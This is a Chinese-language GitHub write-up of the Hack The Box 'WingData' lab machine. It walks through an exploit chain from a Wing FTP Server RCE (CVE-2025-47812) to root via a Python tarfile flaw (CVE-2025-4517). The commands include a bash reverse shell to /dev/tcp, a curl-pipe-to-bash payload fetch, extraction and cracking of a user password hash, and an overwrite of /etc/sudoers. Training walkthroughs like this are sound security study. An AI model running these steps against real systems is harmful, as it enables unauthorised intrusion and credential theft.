karimelsheikh1/HTB-WingData-Writeup

GitHub: karimelsheikh1/HTB-WingData-Writeup

一篇针对 Hack The Box WingData 靶机的完整渗透 Writeup，演示了从 CVE-2025-47812 未授权 RCE 到 CVE-2025-4517 提权的全链攻击过程。

Stars: 0 | Forks: 0

# HackTheBox - WingData Writeup **难度：** 简单 | **操作系统：** Linux | **赛季：** 10 ![HTB](https://img.shields.io/badge/HackTheBox-WingData-green) ![Status](https://img.shields.io/badge/Status-Pwned-brightgreen) ## 总结 WingData 是一台简单难度的 Linux 机器，展示了从未授权服务利用到 root 权限提升的完整攻击链。 **攻击链：** RCE (CVE-2025-47812) → 凭据提取 → 哈希破解 → SSH → Root (CVE-2025-4517) ## 枚举 ### Nmap ``` nmap -sCV -A 10.129.244.106 ``` **开放端口：** - 22/tcp — OpenSSH 9.2p1 (Debian) - 80/tcp — Apache 2.4.66 → 重定向至 `wingdata.htb` ### /etc/hosts ``` echo "10.129.244.106 wingdata.htb ftp.wingdata.htb" | sudo tee -a /etc/hosts ``` ### 目录模糊测试 ``` ffuf -u http://wingdata.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt \ -mc 200,301,302,403 -t 40 ``` 重要发现：`/assets`、`/vendor` ### FTP 子域名浏览 `http://ftp.wingdata.htb` 发现： **Wing FTP Server v7.4.3** — 存在 CVE-2025-47812 漏洞 ## 初始访问 — CVE-2025-47812 (未授权 RCE) ``` git clone https://github.com/4m3rr0r/CVE-2025-47812-poc.git cd CVE-2025-47812-poc ``` 启动监听器： ``` nc -lvnp 5555 ``` 提供 Payload 并进行利用： ``` echo 'bash -i >& /dev/tcp/YOUR_IP/5555 0>&1' > /tmp/shell.sh cd /tmp && python3 -m http.server 8080 python3 CVE-2025-47812.py -u http://ftp.wingdata.htb \ -c "curl http://YOUR_IP:8080/shell.sh|bash" -v ``` 以 `wingftp` 用户身份接收到 Shell。 ## 凭据提取 ``` cat /opt/wftpserver/Data/1/users/wacky.xml ``` 提取到的哈希： ### 哈希破解 (Hashcat) ``` echo "HASH:WingFTP" > wacky.txt hashcat -m 1410 wacky.txt /usr/share/wordlists/rockyou.txt ``` **破解成功：** `*********^*Bride5` ## 横向移动 — 以 wacky 身份进行 SSH ``` ssh wacky@10.129.244.106 # password: !#*********Bride5 cat ~/user.txt # User flag ✅ ``` ## 权限提升 — CVE-2025-4517 ### Sudo 枚举 ``` sudo -l # (root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py * ``` 备份还原脚本以 root 身份运行，且不安全地使用了 `tarfile.extractall()`，允许恶意的 tar 归档文件覆盖 `/etc/sudoers`。 ### 漏洞利用 ``` # 在 Kali 上 git clone https://github.com/AzureADTrent/CVE-2025-4517-POC-HTB-WingData.git cd CVE-2025-4517-POC-HTB-WingData python3 -m http.server 80 # 在目标上 cd /tmp wget http://YOUR_IP/CVE-2025-4517-POC.py python3 /tmp/CVE-2025-4517-POC.py ``` ### Root Shell ``` sudo /bin/bash id # uid=0(root) cat /root/root.txt # Root flag ✅ ``` ## 引用的 CVE | CVE | 描述 | |-----|-------------| | CVE-2025-47812 | Wing FTP Server v7.4.3 未授权 RCE | | CVE-2025-4517 | Python tarfile 通过不安全提取实现路径穿越 | ## 使用的工具 - nmap - ffuf - netcat - hashcat - Python3 *Writeup 由 [KARIM ELSHEIKH] 提供 — HackTheBox 第 10 赛季*

标签：CISA项目, CTI, CVE-2025-4517, CVE-2025-47812, FTP漏洞, HackTheBox, Hash破解, IP 地址批量处理, RCE, SSH, WP, Writeup, 协议分析, 反弹Shell, 大数据, 权限提升, 横向移动, 漏洞复现, 目录扫描, 编程规范, 网络安全, 网络安全审计, 隐私保护, 靶机攻略